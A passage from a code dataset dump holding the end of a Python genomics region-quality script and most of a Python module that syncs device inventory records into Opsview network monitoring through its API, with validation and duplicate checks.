self.info_string_symbols:\n self.data[strain]['count_' + sym][index] = counts[sym]\n\n def generate_output(self):\n '''\n Yield lines for writing to the quality output file.\n To save memory, this effectively deletes the data structure!\n Outputs are tab delimited, sorted by region_id\n '''\n # reorganize output as list of tuples ordered by label\n output = []\n # have to store this as dict changes during iterations\n strains = list(self.data.keys())\n for strain in strains:\n # pop to limit memory usage\n d = self.data.pop(strain)\n output += list(zip(*[d[l] for l in self.labels]))\n\n # sort by region id (index 0, remove r #[1:])\n for entry in sorted(output, key=lambda e: int(e[0][1:])):\n yield '\\t'.join([str(e) for e in entry]) + '\\n'\n\n def generate_header(self):\n '''\n Generate a header line for the region database\n '''\n return '\\t'.join(self.labels) + '\\n'\n\n\nclass Region_Writer():\n '''\n Controls the writing of region files and indices\n '''\n def __init__(self,\n region_file: str,\n index_file: str,\n known_states: List[str]):\n self.region_file = region_file\n self.index_file = index_file\n self.index = {}\n self.known_states = known_states\n\n def __enter__(self):\n self.region_writer = gzip.open(self.region_file, 'wt')\n\n return self\n\n def __exit__(self, type, value, traceback):\n self.region_writer.close()\n\n if traceback is None:\n # write index\n with open(self.index_file, 'wb') as index_writer:\n pickle.dump(self.index, index_writer)\n return True\n\n else:\n return False\n\n def write_header(self, region_id: str):\n '''\n Add a header line with the region id\n '''\n self.index[int(region_id[1:])] = self.region_writer.tell()\n self.region_writer.write(f'#{region_id}\\n')\n\n def write_sequences(self,\n strain: str,\n alignments: List,\n sequences: np.array,\n indices: Tuple):\n '''\n Write sequences to region file\n '''\n start, end = indices\n names = self.known_states + [strain]\n for sj, name in enumerate(names):\n startj = bisect.bisect_left(alignments[sj], start)\n endj = bisect.bisect_left(alignments[sj], end)\n\n self.region_writer.write(f'> {name} {startj} {endj}\\n')\n\n self.region_writer.write(''.join(\n sequences[sj][start:end+1]) + '\\n')\n\n def write_info_string(self, info_string: str):\n '''\n Write info string with header to region file\n '''\n # write info string\n self.region_writer.write('> info\\n')\n self.region_writer.write(info_string + '\\n')\n\n\nclass Position_Reader():\n '''\n Read in position file, yielding positions until no longer on current\n chromosome\n '''\n\n def __init__(self, position_file):\n self.position_file = position_file\n self.last_position = 0\n\n def __enter__(self):\n self.reader = gzip.open(self.position_file, 'rt')\n return self\n\n def __exit__(self, type, value, traceback):\n self.reader.close()\n return traceback is None\n\n def get_positions(self,\n region: Region_Database,\n chromosome: str) -> Tuple[str, np.array]:\n self.reader.seek(self.last_position)\n line = self.next_line()\n while line != '':\n line = line.split('\\t')\n\n chrm = line[1]\n if chrm != chromosome:\n break\n\n strain = line[0]\n if not region.has_strain(strain):\n line = self.next_line()\n continue\n\n yield strain, np.array(line[2:], dtype=int)\n\n line = self.next_line()\n\n def next_line(self) -> str:\n self.last_position = self.reader.tell()\n line = self.reader.readline()\n return line\n\n\nclass Quality_Writer():\n '''\n Control writing of quality file from region database\n '''\n def __init__(self, quality_filename):\n 
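'''\n        Store the quality output filename; the file itself is opened in __enter__\n        '''\n        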
self.filename = quality_filename\n self.first_write = True\n\n def __enter__(self):\n self.writer = open(self.filename, 'w')\n return self\n\n def __exit__(self, type, value, traceback):\n self.writer.close()\n return traceback is None\n\n def write_quality(self, region: Region_Database):\n '''\n Writes header if needed and region database values\n '''\n if self.first_write is True:\n self.writer.write(region.generate_header())\n self.first_write = False\n\n for line in region.generate_output():\n self.writer.write(line)\n","sub_path":"code/analyze/summarize_region_quality.py","file_name":"summarize_region_quality.py","file_ext":"py","file_size_in_byte":35517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"54669194","text":"__author__ = 'lhs'\nfrom dbservices import provinces, devicetypes, hostgroups, hosttemplates, icons, monitoringservers, \\\n plannings, opsviewservers, maindeparts\nfrom exc.exceptions import *\nimport logging\nfrom api import opsviewclient, insideclient\nfrom utils import servicechecklog, apilog, jsonload, config, servicecheck\nfrom utils import serviceimportlog\nfrom utils import dbopsview as dbroute\n# Checking valid ip\nimport re\n\nlogger = logging.getLogger(__name__)\n\nAPI_CALLING_ERROR = 200\nKEY_ERROR = 201\n\n\nclass DataMapping:\n # Template default when create new dev\n template_json = jsonload.get_json_template('host.json')\n\n def __init__(self, devices, plannings):\n # logger.debug('total dev from inside: %s' % len(devices))\n self.opsviewclients = {}\n self.devices = devices\n self.plannings = plannings\n\n # Get opsview client for device using key is ip of opsview server that will call opsview restful api\n def get_opsview_client(self, opsview_ip):\n \"\"\"\n :param opsview_ip: ip v4 of opsview api server\n :return: opsviewclient instance\n \"\"\"\n try:\n\n if opsview_ip in self.opsviewclients:\n return self.opsviewclients[opsview_ip]\n\n else:\n new_opsviewclient = opsviewclient.OpsviewClient(opsview_ip=opsview_ip)\n self.opsviewclients[opsview_ip] = new_opsviewclient\n return new_opsviewclient\n except OpsViewAPIError as ex:\n raise\n\n # Start Noc formart for key when mapping to json opsview\n # mapping host title\n @staticmethod\n def get_host_title(dev_name, dev_ip, main_depart):\n return '%s-%s-%s' % (main_depart, dev_name, dev_ip)\n\n # Snmp version\n @staticmethod\n def get_snmp_version_for_opsview_json(snmp_version):\n \"\"\"\n :param snmp_version: value in mapping database 1, 2, 3\n :return: value for opsview json\n \"\"\"\n if (snmp_version == '2') is True:\n return '2c'\n\n return snmp_version\n\n # Alias mapping\n @staticmethod\n def get_alias(province, ring_name, device_type):\n if ring_name != '':\n return '%s_%s_%s' % (province, ring_name, device_type)\n else:\n return '%s_%s' % (province, device_type)\n\n @staticmethod\n def get_inside_data(file_name=None):\n # Call API\n try:\n if file_name is None:\n return insideclient.get_device_list()\n else:\n # Load from file\n return jsonload.get_json_data(file_name)\n except InsideError as ex:\n logger.error(ex)\n\n @staticmethod\n def get_noc_planning_file(file_name):\n plannings = []\n path_file = config.get_configuration_file(file_name)\n f = open(path_file, 'r')\n\n for line in f:\n plannings.append(line)\n\n logger.info('Line Number of planning: %s' % len(plannings))\n return plannings\n\n @staticmethod\n def get_checking_script_info(file_name):\n checking = []\n path_file = config.get_configuration_file(file_name)\n f = 
open(path_file, 'r')\n\n        for line in f:\n            checking.append(line)\n\n        logger.info('Line Number of checking script: %s' % len(checking))\n        return checking\n\n    @staticmethod\n    def get_province(province_name):\n        try:\n            try:\n                province = provinces.get_province(name=province_name)\n                return province\n\n            except ProvinceNotFound:\n                province = provinces.insert_province(name=province_name)\n                return province\n        except ProvinceError:\n            raise\n\n    @staticmethod\n    def get_device_type(device_type_name):\n        try:\n            try:\n                device_type = devicetypes.get_device_type_no_caching(device_type_name)\n                return device_type\n            except DeviceTypeNotFound:\n                device_type = devicetypes.create_device_type(name=device_type_name)\n                return device_type\n        except DeviceTypeError:\n            raise\n\n    # Get Opsview server API\n    @staticmethod\n    def get_opsview_server(ip, name=None, desc=None):\n        try:\n            try:\n                opsview_server = opsviewservers.get_opsview_server(ip)\n                return opsview_server\n            except OpsviewServerNotFound:\n                opsview_server = opsviewservers.insert_opsview_server(ip=ip, name=name, desc=desc)\n                return opsview_server\n        except OpsviewServerError:\n            raise\n\n    @staticmethod\n    def get_main_depart(name):\n        try:\n            try:\n                main_depart = maindeparts.get_main_depart(name=name)\n                return main_depart\n            except OpsviewMainDepartNotFound:\n                main_depart = maindeparts.insert_main_depart(name=name)\n                return main_depart\n        except OpsviewMainDepartError:\n            raise\n\n    # Get planning of dev; if it does not exist, insert it\n    @staticmethod\n    def get_planning(province, device_type, main_depart, opsview_server,\n                     host_group, host_template, icon, monitor_by, snmp_community, snmp_version):\n        try:\n            try:\n                planning = plannings.get_planning_from_inside_info(province=province.name, device_type=device_type.name,\n                                                                   main_depart=main_depart.name)\n                logger.debug(\n                    'duplicate_mapping when insert from mapping file: %s %s %s' % (province, device_type, main_depart))\n                return planning\n            except PlanningNotFound:\n                planning = plannings.insert_planning(province=province, device_type=device_type, host_group=host_group,\n                                                     host_template=host_template, icon=icon, monitor_by=monitor_by,\n                                                     snmp_community=snmp_community, snmp_version=snmp_version,\n                                                     main_depart=main_depart, opsview_server=opsview_server)\n\n                return planning\n        except PlanningError:\n            raise\n\n    # check whether two jsons are the same or not\n    @staticmethod\n    def checking_template_json(conversion_json, host_json):\n        conversion_json = conversion_json['object']\n        host_json = host_json['object']\n        # logger.debug(conversion_json['monitored_by'])\n        # logger.debug(host_json['monitored_by'])\n\n        for key in conversion_json:\n\n            if key in host_json and key in conversion_json:\n                # Different value\n                if host_json[key] != conversion_json[key]:\n                    logger.debug(key)\n                    return False\n\n            # Different key in the two jsons\n            else:\n                return False\n\n        return True\n\n    @staticmethod\n    # Get checking script for each device type\n    def get_checking_script_for_each_dev():\n        checking_script_data = DataMapping.get_checking_script_info('checkingscript.data')\n        logger.debug(checking_script_data)\n        for row in checking_script_data:\n            logger.debug(row)\n            result = row.split('\\t')\n            device_type_name = result[0]\n            script_name = result[1]\n            is_checking = result[2]\n\n            if is_checking == 'v\\n':\n                is_checking = True\n            else:\n                is_checking = False\n\n            try:\n                device_type = DataMapping.get_device_type(device_type_name=device_type_name)\n\n                # Assign updated fields with new values\n                device_type.script_name = script_name\n                device_type.checking = is_checking\n                # Update data\n                
devicetypes.update_device_type(dev_type=device_type)\n except DeviceTypeError as ex:\n logger.error(ex)\n\n # Get planning dev of noc from opsviewplan.data file\n def sync_planning_db(self):\n # logger.info(len(self.plannings))\n logger.info('insert mapping to database')\n for line in self.plannings:\n\n # Thai Binh\tINF-TBH\tZyxel IES 1248-51\t210.245.0.226\t2. DSLAM Chi Nhanh\tFTN DSLAM\n # SYMBOL - xDSL\tOpsview FTN 04\tpublic\t1\n # province, device_type, server, host_group, icon, icon_path, monitor_by, snmp_community = line.split('\\t')\n # logger.debug(result)\n result = line.split('\\t')\n\n province_name = result[0]\n main_depart_name = result[1]\n device_type_name = result[2]\n opsview_sv_ip = result[3]\n host_group_name = result[4]\n host_template_name = result[5]\n icon_name = result[6]\n monitoring_server_name = result[7]\n snmp_rocommunity = result[8]\n snmp_version = result[9]\n # logger.debug(snmp_version.split('\\n'))\n snmp_version = snmp_version.split('\\n')[0]\n # snmp_version = int(snmp_version)\n\n try:\n province = DataMapping.get_province(province_name)\n device_type = DataMapping.get_device_type(device_type_name)\n opsview_server = DataMapping.get_opsview_server(ip=opsview_sv_ip)\n main_depart = DataMapping.get_main_depart(main_depart_name)\n\n host_group = hostgroups.get_host_group(name=host_group_name,\n db_name=dbroute.get_opsview_database(opsview_ip=opsview_sv_ip))\n host_template = hosttemplates.get_host_template(host_template_name,\n db_name=dbroute.get_opsview_database(\n opsview_ip=opsview_sv_ip))\n\n icon = icons.get_icon_using_name(name=icon_name,\n db_name=dbroute.get_opsview_database(opsview_ip=opsview_sv_ip))\n\n monitor_server = monitoringservers.get_monitoring_server(name=monitoring_server_name,\n db_name=dbroute.get_opsview_database(\n opsview_ip=opsview_sv_ip))\n\n DataMapping.get_planning(province=province, device_type=device_type,\n host_group=host_group.name, host_template=host_template.name,\n icon=icon.name,\n monitor_by=monitor_server.name, snmp_community=snmp_rocommunity,\n snmp_version=snmp_version, main_depart=main_depart,\n opsview_server=opsview_server)\n\n except OpsViewError as ex:\n logger.exception(ex)\n continue\n\n @staticmethod\n def add_planning_record_from_csv_data(csv_list):\n \"\"\"\n :param csv_list: list of list [value1, value2, value3]\n :return: None\n \"\"\"\n for row in csv_list:\n logger.debug(row)\n province_name = row[0]\n main_depart_name = row[1]\n device_type_name = row[2]\n opsview_sv_ip = row[3]\n host_group_name = row[4]\n host_template_name = row[5]\n icon_name = row[6]\n monitoring_server_name = row[7]\n snmp_rocommunity = row[8]\n snmp_version = row[9]\n\n try:\n province = DataMapping.get_province(province_name)\n device_type = DataMapping.get_device_type(device_type_name)\n opsview_server = DataMapping.get_opsview_server(ip=opsview_sv_ip)\n main_depart = DataMapping.get_main_depart(main_depart_name)\n\n host_group = hostgroups.get_host_group(name=host_group_name,\n db_name=dbroute.get_opsview_database(opsview_ip=opsview_sv_ip))\n host_template = hosttemplates.get_host_template(host_template_name,\n db_name=dbroute.get_opsview_database(\n opsview_ip=opsview_sv_ip))\n\n icon = icons.get_icon_using_name(name=icon_name,\n db_name=dbroute.get_opsview_database(opsview_ip=opsview_sv_ip))\n\n monitor_by = monitoringservers.get_monitoring_server(name=monitoring_server_name,\n db_name=dbroute.get_opsview_database(\n opsview_ip=opsview_sv_ip))\n\n try:\n plannings.get_planning_from_inside_info(province=province.name,\n 
device_type=device_type.name,\n main_depart=main_depart.name)\n\n message = 'duplicate_mapping when insert from mapping file: %s %s %s' % (province.name,\n device_type.name,\n main_depart.name)\n serviceimportlog.insert_log(description=message, error_code=PlanningImportExist.error_code,\n csv_record_data=row)\n except PlanningNotFound:\n plannings.insert_planning(province=province, device_type=device_type, host_group=host_group,\n host_template=host_template, icon=icon, monitor_by=monitor_by,\n snmp_community=snmp_rocommunity, snmp_version=snmp_version,\n main_depart=main_depart, opsview_server=opsview_server)\n\n\n\n except OpsViewError as ex:\n serviceimportlog.insert_log(error_code=ex.error, description=ex.msg, csv_record_data=row)\n logger.exception(ex)\n continue\n\n # check correct data from inside and opsview. If opsview have one template,\n # from planning dev of db have to exist this template\n def check_info_between_inside_and_noc_planning(self):\n\n for dev in self.devices:\n device_type = dev['DeviceType']\n if device_type == '':\n continue\n\n province = dev['KhuVuc']\n # print '%s: %s' % (device_type, province)\n\n try:\n devicetypes.get_device_type(name=device_type)\n except DeviceTypeNotFound as ex:\n logger.error(ex)\n logger.error(dev)\n\n try:\n provinces.get_province(name=province)\n except ProvinceNotFound as ex:\n logger.error(ex)\n logger.error(dev)\n\n # check duplicate dev's name in all inside dev\n def check_duplicate_host_title_inside_devices(self):\n devices = self.devices\n length = len(self.devices)\n\n for i in range(length):\n # Initial device\n is_duplication = False\n before_duplicate = False\n if i > 0:\n # Check from i to start list. Checking for prevent print duplicate device again\n for k in range(i):\n if devices[k]['TenThietBi'] == devices[i]['TenThietBi'] and devices[k]['IP'] == devices[i]['IP']:\n before_duplicate = True\n break\n\n if before_duplicate:\n continue\n # Check duplicate from i +1 to end list\n for j in range(i + 1, length):\n if devices[j]['TenThietBi'] == devices[i]['TenThietBi'] and devices[j]['IP'] == devices[i]['IP']:\n is_duplication = True\n logger.warn('duplicate host title: %s - %s' % (j, jsonload.get_json_string_from_dict(devices[j])))\n\n # If duplicate device, print device\n if is_duplication is True:\n logger.warn('duplicate host title: %s - %s' % (i, jsonload.get_json_string_from_dict(devices[i])))\n logger.warn('-----------------------------------------')\n\n # check duplicate error dev with have khuvuc, devicetype equal\n\n def check_duplicate_error_mapping(self):\n devices = self.devices\n length = len(self.devices)\n\n for i in range(length):\n # Initial device\n is_duplication = False\n before_duplicate = False\n if i > 0:\n # Check from i to start list. 
This prevents printing a duplicate device again\n                for k in range(i):\n                    if str(devices[k]['DeviceType']) == str(devices[i]['DeviceType']) and str(devices[k]['KhuVuc']) \\\n                            == str(devices[i]['KhuVuc']):\n                        before_duplicate = True\n                        break\n            # Prevent printing the device again\n            if before_duplicate:\n                continue\n\n            # Check for duplicates from i + 1 to the end of the list\n            for j in range(i + 1, length):\n                if str(devices[j]['DeviceType']) == str(devices[i]['DeviceType']) and str(devices[j]['KhuVuc']) == \\\n                        str(devices[i]['KhuVuc']):\n                    is_duplication = True\n                    logger.warn(\n                        'duplicate error mapping: %s - %s' % (j, jsonload.get_json_string_from_dict(devices[j])))\n\n            # If the device is duplicated, print it\n            if is_duplication is True:\n                logger.warn('duplicate error mapping: %s - %s' % (i, jsonload.get_json_string_from_dict(devices[i])))\n                logger.warn('-----------------------------------------')\n            else:\n                logger.warn(jsonload.get_json_string_from_dict(devices[i]))\n                # logger.warn(devices[i])\n\n    # check duplicate IP\n\n    def check_duplicate_ip_inside_devices(self):\n        devices = self.devices\n        length = len(self.devices)\n\n        for i in range(length):\n            # Initial device\n            is_duplication = False\n            before_duplicate = False\n            if i > 0:\n                # Check from i back to the start of the list; this prevents printing a duplicate device again\n                for k in range(i):\n                    if str(devices[k]['IP']) == str(devices[i]['IP']):\n                        before_duplicate = True\n                        break\n            # Prevent printing the device again\n            if before_duplicate:\n                continue\n\n            # Check for duplicates from i + 1 to the end of the list\n            for j in range(i + 1, length):\n                if str(devices[j]['IP']) == str(devices[i]['IP']):\n                    is_duplication = True\n                    logger.warn('duplicate ip: %s - %s' % (j, jsonload.get_json_string_from_dict(devices[j])))\n\n            # If the device is duplicated, print it\n            if is_duplication is True:\n                logger.warn('duplicate ip: %s - %s' % (i, jsonload.get_json_string_from_dict(devices[i])))\n                logger.warn('-----------------------------------------')\n\n    # check that a mapping exists for each device\n    def check_exist_mapping_for_device(self):\n        error_devs = []\n        for dev in self.devices:\n            dev_type = dev['DeviceType']\n            province = dev['KhuVuc']\n            main_depart = dev['MainDepart']\n            try:\n                mapping = plannings.get_planning_from_inside_info(province=province, device_type=dev_type,\n                                                                  main_depart=main_depart)\n                logger.debug(jsonload.get_json_string_from_dict(\n                    DataMapping.mapping_to_opsview_json(inside_device=dev, mapping=mapping,\n                                                        template=self.template_json)))\n            except PlanningError:\n                # No mapping record found for dev\n                logger.warning('mapping invalid: %s' % jsonload.get_json_string_from_dict(dev))\n                error_devs.append(dev)\n\n        # jsonload.export_json_to_file({'getListDeviceAccessResult': error_devs}, 'error_devs_mapping.json')\n\n    # Check that the dev's ip is correct\n    @staticmethod\n    def is_valid_ip(ip):\n        m = re.match(r\"^(\\d{1,3})\\.(\\d{1,3})\\.(\\d{1,3})\\.(\\d{1,3})$\", ip)\n        is_valid = bool(m) and all(map(lambda n: 0 <= int(n) <= 255, m.groups()))\n\n        # Catch invalid cases with leading zeros, e.g. 255.255.5.09\n        if is_valid is True:\n            array_number = ip.split('.')\n            for number in array_number:\n                if len(number) > 1 and number[0] == '0':\n                    return False\n\n        return is_valid\n\n    # Check for a valid name\n    # check that the name does not have special characters\n    @staticmethod\n    def is_valid_name(name):\n        # Characters a to z, 0 to 9, A to Z, length from 3 to 30 characters\n        prog = re.compile(\"^[a-z0-9A-Z]{3,30}$\")\n        # Pass\n        if prog.match(name):\n            return True\n\n        # False\n        return False\n\n    @staticmethod\n    def mapping_to_opsview_json(inside_device, mapping=None, template=None, 
update_host_attribute=False):\n \"\"\"\n :param inside_device: information of inside dev,\n {\"ChungLoai\": \"OLT\", \"KhuVuc\": \"Ninh Thuan\",\n \"MainDepart\": \"INF-NTN\",\n \"IP\": \"10.10.182.37\",\n \"RingName\": \"NTN-Ring6\",\n \"DeviceType\": \"GL5600-08P\",\n \"TenThietBi\": \"NTNP00603GC57\"}\n :param template: template from host.json or opsview json from api\n {'object': dev_info_dict}\n :return: json mapping\n \"\"\"\n\n if template is None:\n template = jsonload.get_json_template('host.json')\n\n ring_name = inside_device['RingName']\n province = inside_device['KhuVuc']\n ip = inside_device['IP']\n device_type = inside_device['DeviceType']\n device_name = inside_device['TenThietBi']\n main_depart = inside_device['MainDepart']\n\n template['object']['ip'] = ip\n # Unique host title\n template['object']['name'] = DataMapping.get_host_title(dev_name=device_name,\n dev_ip=ip, main_depart=main_depart)\n\n template['object']['alias'] = DataMapping.get_alias(province=province, ring_name=ring_name,\n device_type=device_type)\n\n try:\n # Get mapping in database. This is dev planning from noc.\n if mapping is None:\n mapping = plannings.get_planning_from_inside_info(province=province, device_type=device_type,\n main_depart=main_depart)\n\n snmp_version = DataMapping.get_snmp_version_for_opsview_json(mapping.snmp_version)\n # Service check mapping\n\n if update_host_attribute is True and mapping.device_type.checking is True:\n # Test do not throw exception\n try:\n\n service_check = servicecheck.get_attributes(script_name=mapping.device_type.script_name,\n version=snmp_version,\n ip=ip, snmp_key=mapping.snmp_community,\n time_out=mapping.device_type.time_out,\n arguments=mapping.device_type.arguments)\n # Timer for script\n '''\n end_time = datetime.now()\n from datetime import datetime, timedelta\n start_time = datetime.now()\n\n if (start_time + timedelta(minutes=1)) < end_time:\n logger.critical('long time: %s' % jsonload.get_json_string_from_dict(inside_device))\n '''\n\n logger.debug('service check from script %s' % jsonload.get_json_string_from_dict(service_check))\n logger.debug('service check from opsview response: %s' % jsonload.get_json_string_from_dict(\n template['object']['hostattributes']))\n\n # check different servicecheck\n is_same, sorted_service_check = jsonload.is_same_service_check(service_check,\n template['object']['hostattributes'])\n\n logger.debug('service_check_compare: %s' % is_same)\n logger.debug(sorted_service_check)\n\n # Update on json opsview if result of service_check is not []\n if len(service_check) > 0:\n if is_same is False:\n update_service_check = jsonload.merge_service_check(service_check,\n list(template['object'][\n 'hostattributes']))\n logger.debug('update service check: %s' % update_service_check)\n template['object']['hostattributes'] = update_service_check\n\n # template['object']['hostattributes'] = sorted_service_check\n else:\n\n servicechecklog.write_service_check_log(device_info=inside_device,\n description='result script is []', status='error',\n device_name=device_name, error_code=500)\n logger.warning(jsonload.get_json_string_from_dict(inside_device))\n\n except TimeoutScript as ex:\n servicechecklog.write_service_check_log(device_info=inside_device,\n description=ex.msg, status='error',\n device_name=device_name, error_code=600)\n logger.warning('long time: %s' % jsonload.get_json_string_from_dict(inside_device))\n\n except OpsViewError as ex:\n logger.error(ex)\n\n # host_template list\n host_template_host = 
[hosttemplates.get_host_template(name=mapping.host_template,\n db_name=dbroute.get_opsview_database(\n mapping.opsview_server.ip)).to_dict()]\n\n # logger.debug(host_template_host)\n template['object']['hosttemplates'] = host_template_host\n\n template['object']['hostgroup'] = hostgroups.get_host_group(name=mapping.host_group,\n db_name=dbroute.get_opsview_database(\n mapping.opsview_server.ip)).to_dict()\n\n template['object']['snmp_community'] = mapping.snmp_community\n template['object']['icon'] = icons.get_icon_using_name(name=mapping.icon,\n db_name=dbroute.get_opsview_database(\n opsview_ip=mapping.opsview_server.ip)).to_dict()\n\n template['object']['monitored_by'] = monitoringservers.get_monitoring_server(name=mapping.monitor_by,\n db_name=dbroute.get_opsview_database(\n opsview_ip=\n mapping.opsview_server.ip)).to_dict()\n template['object']['snmp_version'] = snmp_version\n logger.debug(template['object']['snmp_version'])\n return template\n except OpsViewError:\n raise\n\n # Get all dev from inside to check correct format of ipv4\n def check_invalid_ip(self):\n for dev in self.devices:\n ip = dev['IP']\n if DataMapping.is_valid_ip(ip=ip) is False:\n logger.warn('invalid ip: %s' % jsonload.get_json_string_from_dict(dev))\n\n # Get all dev from inside to check correct name validation\n def check_invalid_dev_name(self):\n for dev in self.devices:\n name = dev['TenThietBi']\n if DataMapping.is_valid_name(name) is False:\n logger.warn('invalid name: %s' % jsonload.get_json_string_from_dict(dev))\n\n def check_none_filed(self, filed):\n for dev in self.devices:\n # logger.debug(dev)\n if dev[filed] == '':\n logger.warn('None filed: %s %s' % (filed, jsonload.get_json_string_from_dict(dev)))\n\n def test_valid_data_noc_planning(self):\n for line in self.plannings:\n logger.debug(line)\n result = line.split('\\t')\n province_name = result[0]\n main_depart = result[1]\n device_type_name = result[2]\n opsview_sv_ip = result[3]\n host_group_name = result[4]\n host_template_name = result[5]\n icon_name = result[6]\n monitoring_server_name = result[7]\n snmp_rocommunity = result[8]\n snmp_version = result[9]\n snmp_version = int(snmp_version)\n\n if (province_name is None or province_name == '' or main_depart is None or main_depart == '' or\n device_type_name is None or device_type_name == '' or DataMapping.is_valid_ip(\n opsview_sv_ip) is False\n or host_group_name is None or host_group_name == ''\n or host_template_name is None or host_group_name == ''\n or icon_name is None or icon_name == ''\n or monitoring_server_name is None or monitoring_server_name == ''\n or snmp_rocommunity is None or snmp_rocommunity == ''\n or snmp_version is None or snmp_version == ''):\n logger.warn('invalid mapping data: %s' % result)\n\n # Update dev with inside dev information on opsview\n def update_info_opsview_for_device(self, dev, update_host_attribute=False):\n \"\"\"\n :param dev: device information from inside\n :return: None\n \"\"\"\n\n object_type = 'host'\n json_filter = '{\"ip\":{\"-like\":\"%s\"}}'\n # url_filter='row=all&cols=name,ip,hostgroup'\n url_filter = None\n\n # Get all information for get record mapping of noc planning\n province = dev['KhuVuc']\n device_type = dev['DeviceType']\n main_depart = dev['MainDepart']\n dev_ip = dev['IP']\n mapping = None\n\n try:\n logger.debug(dev)\n\n # Get information mapping of Noc\n mapping = plannings.get_planning_from_inside_info(province=province, device_type=device_type,\n main_depart=main_depart)\n opsview_client = 
self.get_opsview_client(opsview_ip=mapping.opsview_server.ip)\n\n # Get host information from opsview using api\n result = opsview_client.get_generic_list(object_type=object_type, json_filter=json_filter % dev_ip,\n url_filter=url_filter)\n # Get total record of result\n result_len = int(result['summary']['totalrows'])\n\n # Create new device\n if result_len == 0:\n # Mapping json for new inside dev with default json template\n template_json = DataMapping.mapping_to_opsview_json(inside_device=dev, mapping=mapping,\n template=self.template_json,\n update_host_attribute=update_host_attribute)\n\n logger.debug('new template: %s' % jsonload.get_json_string_from_dict(template_json))\n data = opsview_client.insert_host(host=template_json)\n logger.debug('inserted data: %s' % jsonload.get_json_string_from_dict(data))\n\n # Check host group of all result hosts\n updated_list = []\n if result_len >= 1:\n\n # Get list host have same host group with mapping record\n for host in result['list']:\n # If have same host group name\n if host['hostgroup']['name'] == mapping.host_group:\n updated_list.append(host)\n\n # error when configure host. On one host group have two same ip's device\n if len(updated_list) > 1:\n msg = 'more one host on hostgroup: %s' % updated_list\n logger.warn(msg)\n raise AmbiguousHost(msg=msg)\n\n else:\n # Add new device\n if len(updated_list) == 0:\n # Mapping inside dev to opsview json\n template_json = DataMapping.mapping_to_opsview_json(inside_device=dev, mapping=mapping,\n template=self.template_json,\n update_host_attribute=update_host_attribute)\n\n logger.debug('new template: %s' % jsonload.get_json_string_from_dict(template_json))\n data = opsview_client.insert_host(host=template_json)\n logger.debug('inserted data: %s' % jsonload.get_json_string_from_dict(data))\n\n else:\n # update device\n # Get only one dev in updated_list\n updated_dev = dict(updated_list.pop(0))\n temp = dict(updated_dev)\n # logger.info(updated_dev['name'])\n\n logger.debug('result api: %s' % jsonload.get_json_string_from_dict(updated_dev))\n\n temp_json = {}\n temp_json.setdefault('object', dict(updated_dev))\n\n # Get update json template from inside dev information\n updated_template_json = DataMapping.mapping_to_opsview_json(inside_device=dev,\n template=temp_json, mapping=mapping,\n update_host_attribute=update_host_attribute)\n\n result = updated_template_json['object']\n\n logger.debug('result before call mapping_to_opsview_json function: %s'\n % jsonload.get_json_string_from_dict(updated_dev))\n\n logger.debug('result update: %s' % jsonload.get_json_string_from_dict(result))\n\n logger.debug('template_json_compare: %s' % (updated_dev == result))\n\n # Compare two json opsview\n is_same = jsonload.is_same_dict(updated_dev, result)\n\n # Update device\n if not is_same:\n # Mapping from exist template json of host\n # host_id = 24411\n host_id = updated_dev['id']\n\n # Remove ip and ref key in dict\n '''\n if 'ip' in updated_dev:\n del updated_dev['ip']\n\n if 'ref' in updated_dev:\n del updated_dev['ref']\n '''\n\n logger.debug('backup template: %s' %\n jsonload.get_json_string_from_dict({'object': updated_dev}))\n\n '''\n host_attributes = updated_template_json['object']['hostattributes']\n logger.debug(host_attributes)\n for row in host_attributes:\n logger.debug(row)\n '''\n\n logger.debug(\n 'updated_template: %s' % jsonload.get_json_string_from_dict(updated_template_json))\n data = opsview_client.update_host(host_id=host_id, updated_data=updated_template_json)\n logger.debug('updated 
data: %s' % jsonload.get_json_string_from_dict({'object': data}))\n                else:\n                    pass\n                    # Do nothing\n                    logger.debug(jsonload.get_json_string_from_dict(dev))\n                    logger.debug(jsonload.get_json_string_from_dict(updated_dev))\n                    logger.debug(jsonload.get_json_string_from_dict(updated_template_json))\n\n                # Get attribute host of all template\n\n                '''\n                host_attributes = updated_template_json['object']['hostattributes']\n                for row in host_attributes:\n                    for key in row:\n                        if key == 'value':\n                            logger.debug('%s: %s' % (key, row[key]))\n                '''\n\n        # Token has expired\n        except OpsviewExpiredTokenError:\n            # Delete the opsview_client instance; the next call to get_opsview_client will create a new one.\n            if mapping is not None:\n                del self.opsviewclients[mapping.opsview_server.ip]\n            raise\n\n        except (PlanningError, OpsViewError):\n            raise\n\n    # Update inside dev list\n    def auto_mapping(self, province=None, start=None, end=None, update_host_attributes=False):\n        \"\"\"\n        :param update_host_attributes: run script and update result\n        :param end: end position in the device list\n        :param start: start position in the device list\n        :param province: if None, map devices in all provinces;\n        otherwise only map devices in that province\n        :return: None\n        \"\"\"\n\n        if start is None:\n            start = 0\n\n        if end is None:\n            end = len(self.devices)\n\n        error_dev_list = []\n        # for dev in self.devices:\n        for index in range(start, end):\n            logger.debug('index: %s' % index)\n            dev = self.devices[index]\n\n            # Check valid IP\n            if DataMapping.is_valid_ip(dev['IP']) is False:\n                logger.warning('invalid ip: %s' % jsonload.get_json_string_from_dict(dev))\n                continue\n\n            if DataMapping.is_valid_name(dev['TenThietBi']) is False:\n                logger.warning('invalid name: %s' % jsonload.get_json_string_from_dict(dev))\n                continue\n\n            # If a province is specified, only update devices in that province\n            if province is not None:\n                if dev['KhuVuc'] != province:\n                    continue\n\n            # Update device\n            try:\n                self.update_info_opsview_for_device(dev, update_host_attribute=update_host_attributes)\n            except OpsviewExpiredTokenError as ex:\n                # Expired token\n                logger.warning(ex)\n                logger.warning('expired token: %s' % jsonload.get_json_string_from_dict(dev))\n                apilog.write_api_log(device_info=dev, description=ex.msg, status='error',\n                                     device_name=dev['TenThietBi'], error_code=ex.error, action='auto')\n\n            except (PlanningError, OpsViewError) as ex:\n                # Error while processing the mapping\n                logger.error(ex)\n                logger.error('%s: %s' % (index, dev))\n                apilog.write_api_log(device_info=dev, description=ex.msg, status='error',\n                                     device_name=dev['TenThietBi'], error_code=ex.error, action='auto')\n                # Add to error dev list\n                error_dev_list.append(dev)\n                continue\n\n        # Log inside devices that could not be mapped\n        logger.error(jsonload.get_json_string_from_dict({'error_dev': error_dev_list}))\n        # jsonload.export_json_to_file(error_dev_list, 'error_dev')\n\n\ndef test_syncdb_between_mapping_opsview():\n    try:\n        mapping_list = plannings.get_mapping_list()\n        error_mapping_list = []\n        for mapping in mapping_list:\n            error = True\n         